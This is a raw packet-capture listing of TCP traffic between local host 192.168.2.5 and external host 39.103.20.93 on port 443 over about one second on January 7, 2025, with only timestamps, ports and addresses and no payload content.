                                                  Jan 7, 2025 09:59:34.980915070 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.980933905 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.980940104 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.980952978 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.980978012 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981066942 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981115103 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981247902 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981277943 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981295109 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981298923 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981312990 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981337070 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981360912 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981405020 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981462002 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981512070 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981750965 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981782913 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981801987 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981806993 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981842041 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981851101 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.981904030 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.981956005 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982014894 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982059956 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982064962 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982069016 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982100010 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982109070 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982271910 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982316017 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982364893 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982393980 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982407093 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982409954 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982435942 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982454062 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982603073 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982635975 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982649088 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982652903 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982678890 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982681036 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982690096 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982693911 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982713938 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982721090 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982744932 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982745886 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982757092 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982772112 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982781887 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982800007 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982804060 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.982824087 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.982844114 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983383894 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983422995 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983436108 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983438969 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983453035 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983464956 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983479023 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983483076 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983490944 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983508110 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983540058 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983542919 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983586073 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983721972 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983757019 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983772993 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983777046 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983787060 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983800888 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983815908 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983819008 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.983844042 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.983874083 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.984040022 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.984070063 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.984092951 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.984097958 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.984110117 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.984133005 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067331076 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067365885 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067393064 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067399025 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067413092 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067450047 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067455053 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067466974 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067502022 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067545891 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067595959 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067687988 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067734003 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067809105 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067857981 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.067888975 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.067934990 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068135023 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068166018 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068181992 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068186045 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068207979 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068226099 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068274975 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068305016 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068330050 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068334103 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068346024 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068382978 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068475008 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068519115 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068710089 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068758011 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068872929 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068903923 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068916082 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068921089 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.068955898 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068955898 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.068974972 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069009066 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069020033 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069024086 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069034100 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069051981 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069061041 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069063902 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069094896 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069109917 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069142103 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069171906 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069188118 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069191933 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069211006 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069226980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069506884 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069535017 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069547892 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069557905 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069574118 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069593906 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069744110 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069772005 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069782019 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069787979 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069814920 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069839001 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069853067 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069886923 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069899082 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069904089 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069920063 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069926977 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069950104 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069951057 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.069961071 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.069977999 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.070012093 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.070497990 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.070532084 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.070543051 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.070549965 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.070560932 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.070568085 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.070595980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.070600033 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.070641041 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215212107 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215251923 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215289116 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215301037 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215317011 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215347052 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215368032 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215491056 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215517998 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215538979 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215544939 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215555906 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215588093 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215630054 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215672016 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215807915 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215835094 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215854883 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215859890 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.215871096 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215895891 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.215959072 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216005087 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216164112 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216198921 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216211081 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216214895 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216238976 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216253042 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216415882 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216449976 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216459990 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216464043 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216489077 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216489077 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216502905 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216506004 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216532946 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216556072 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216753960 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216785908 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216801882 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216805935 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216829062 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216893911 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.216960907 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.216994047 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217012882 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217017889 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217037916 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217057943 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217178106 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217231989 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217320919 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217350960 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217377901 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217381954 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217391968 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217420101 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217531919 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217565060 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217572927 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217576981 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217622995 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217668056 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217701912 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217719078 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217722893 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217734098 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217734098 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217761040 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217763901 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217775106 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.217786074 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.217824936 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218301058 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218341112 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218365908 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218369961 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218380928 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218381882 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218406916 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218410015 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218420982 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218440056 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218447924 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218468904 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218475103 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.218501091 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.218518019 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.302747965 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.302787066 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.302824020 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.302833080 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.302866936 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.302890062 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.302933931 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.302963018 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.302982092 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.302988052 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303010941 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303035975 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303159952 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303198099 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303210020 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303214073 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303235054 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303248882 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303258896 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303262949 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303272963 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303292990 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303325891 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303330898 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303370953 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303653002 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303699970 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303703070 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303711891 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303746939 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303746939 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303761005 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303764105 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.303791046 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.303817987 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304071903 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304106951 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304120064 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304124117 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304137945 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304147959 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304171085 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304174900 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304204941 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304234982 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304260969 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304306030 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304307938 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304313898 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304359913 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304527044 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304562092 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304586887 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304591894 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304611921 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304615021 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304630041 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304634094 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304656982 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304663897 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304689884 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304693937 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304706097 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304722071 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304737091 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304748058 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304753065 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.304781914 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.304795980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307379007 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.307431936 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307454109 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.307501078 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307701111 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.307730913 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.307743073 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307746887 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:35.307773113 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307791948 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:35.307840109 CET4434998139.103.20.93192.168.2.5
